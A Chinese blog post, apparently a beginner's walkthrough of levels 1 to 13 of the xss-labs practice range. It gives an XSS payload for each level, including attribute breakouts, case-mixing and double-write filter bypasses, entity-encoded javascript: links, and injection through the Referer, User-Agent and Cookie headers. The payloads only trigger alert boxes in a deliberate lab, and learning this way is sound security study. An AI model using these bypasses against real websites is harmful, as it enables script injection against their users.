【新手小白的xsslab靶场学习】

【仅供参考学习】

第1关

最开始页面源代码
在这里插入图片描述
直接输入<script>alert(1)</script>
在这里插入图片描述

第2关

页面源代码
在这里插入图片描述
先尝试<script>alert(1)</script>看页面源代码
在这里插入图片描述
<h2>里面尖括号被编码,<input>里面没有编码,直接双引号闭合,
修改payload,输入" onclick=alert('xss') type="
在这里插入图片描述

第3关

页面源码里面没有和这个参数有关系的。
在这里插入图片描述
在搜索框搜索,找到新参数
在这里插入图片描述
在这里插入图片描述
直接闭合" οnclick=alert(‘xss’) type="
在这里插入图片描述
双引号被编码,仔细观察看value后面是单引号,把payload里面的双引号换成单引号,’ οnclick=alert(‘xss’) type=’
在这里插入图片描述

第4关

页面源码相关位置
在这里插入图片描述
直接闭合,输入" οnclick=alert(‘xss’) type="
成功
在这里插入图片描述

第5关

页面源码
在这里插入图片描述
直接输入闭合" οnclick=alert(‘xss’) type="
在这里插入图片描述
发现过滤了onclick,随后又尝试onmouseover,onload,onfocus,onclick,onerror,都被过滤了。换一种想法,直接闭合input标签,输入"> <a href="javascript:alert('xss')">aa</a>
成功
在这里插入图片描述

第6关

页面源码
在这里插入图片描述
输入上一关的payload,"> <a href="javascript:alert('xss')">aa</a>发现href被过滤
在这里插入图片描述
又尝试了href,src,script,onmouseover,onload,onfocus,onclick,action,onerror
都被过滤了,
后面搜索了一下绕过方法,直接大小写绕过,先从href开始
"> <a hREf="javascript:alert('xss')">aa</a>
成功
在这里插入图片描述

第7关

页面源码
在这里插入图片描述
直接输入上面"> <a hREf="javascript:alert('xss')">aa</a>
的payload,发现javascript被替换成java,href被替换成空
在这里插入图片描述
直接双写"> <a hREhREff="javascripscriptt:alert('xss')">aa</a>
成功
在这里插入图片描述

第8关

页面源码
在这里插入图片描述
发现在输入1111添加友情链接,在点击友情链接,直接跳转
在这里插入图片描述
查看源码
在这里插入图片描述
直接javascript:alert(‘xss’)
javascript被过滤,双写也不能绕过
在这里插入图片描述
然后尝试对javascript:alert(‘xss’)进行编码,点击链接直接弹框

&#106;&#97;&#118;&#97;&#115;&#99;&#82;&#105;&#80;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41; 

成功
在这里插入图片描述

第9关

输入和上一关一样的payload之后,发现点击会直接跳转,
在这里插入图片描述
链接不合法,
重新输入http://之后,发现不会跳转
尝试几次之后,发现输入框必须要输入http://才不会跳转到错误页面,
然后尝试对javascript:alert(‘xss’) 进行html编码后,加入http:// ,没有任何反应,应该是http://影响了语句,然后搜索js里面注释标签是/**/
再此输入

&#106;&#97;&#118;&#97;&#115;&#99;&#82;&#105;&#80;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41; /*http://*/

成功
在这里插入图片描述

第10关

页面源码
在这里插入图片描述
观察发现没有其他地方有回显的内容,尝试这个地方基本都过滤了一些标签。
又观察到后面有3个input框是隐藏的。
input表单提交:当用户填写表单并提交时,name属性指定的字段名称将与该字段的值一起作为键值对传递到服务器端。服务器端可以通过这个名称来获取对应字段的值,以便处理用户提交的数据

在url后面加上参数,经过尝试只有t_sort参数才会回显到前端
在这里插入图片描述
双引号闭合,再取消input框隐藏,输入

22" onclick=alert('xss') type="

成功
在这里插入图片描述

第11关

在这里插入图片描述
和第10关一样,这个回显位置不能作为注入点。
尝试form里面input框的其他参数,t_sort也不可以回显了。
参数后加入t_ref,也不会回显
在这里插入图片描述
查看请求包,发现请求包里面没有Referer,
通过hackbar构造一下referer
在这里插入图片描述
在这里插入图片描述
请求头里面的referer修改才会回显到页面源码上,修改referer为
" οnclick=alert(‘xss’) type="
在这里插入图片描述
成功
在这里插入图片描述

第12关

页面源码
在这里插入图片描述
和第11关大差不差,尝试后url后面加参数无法回显到页面上,
但是t_ua后面的value值明显是请求头里面user_agent的内容。
直接" οnclick=alert(‘xss’) type="
在这里插入图片描述
成功
在这里插入图片描述

第13关

页面源码
在这里插入图片描述
第13关页面源码看完,应该是修改cookie,回显到t_cook里面。
尝试直接写2222,不行。
在这里插入图片描述
后面查询资料cookie是key=value结构组成,前面得加字段
cookie:user=value=222
在这里插入图片描述
回显
在这里插入图片描述
输入user=22222" οnclick=alert(‘xss’) type="
成功
在这里插入图片描述
后面的几关,本菜鸡不太会,也没看懂

  • 25
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值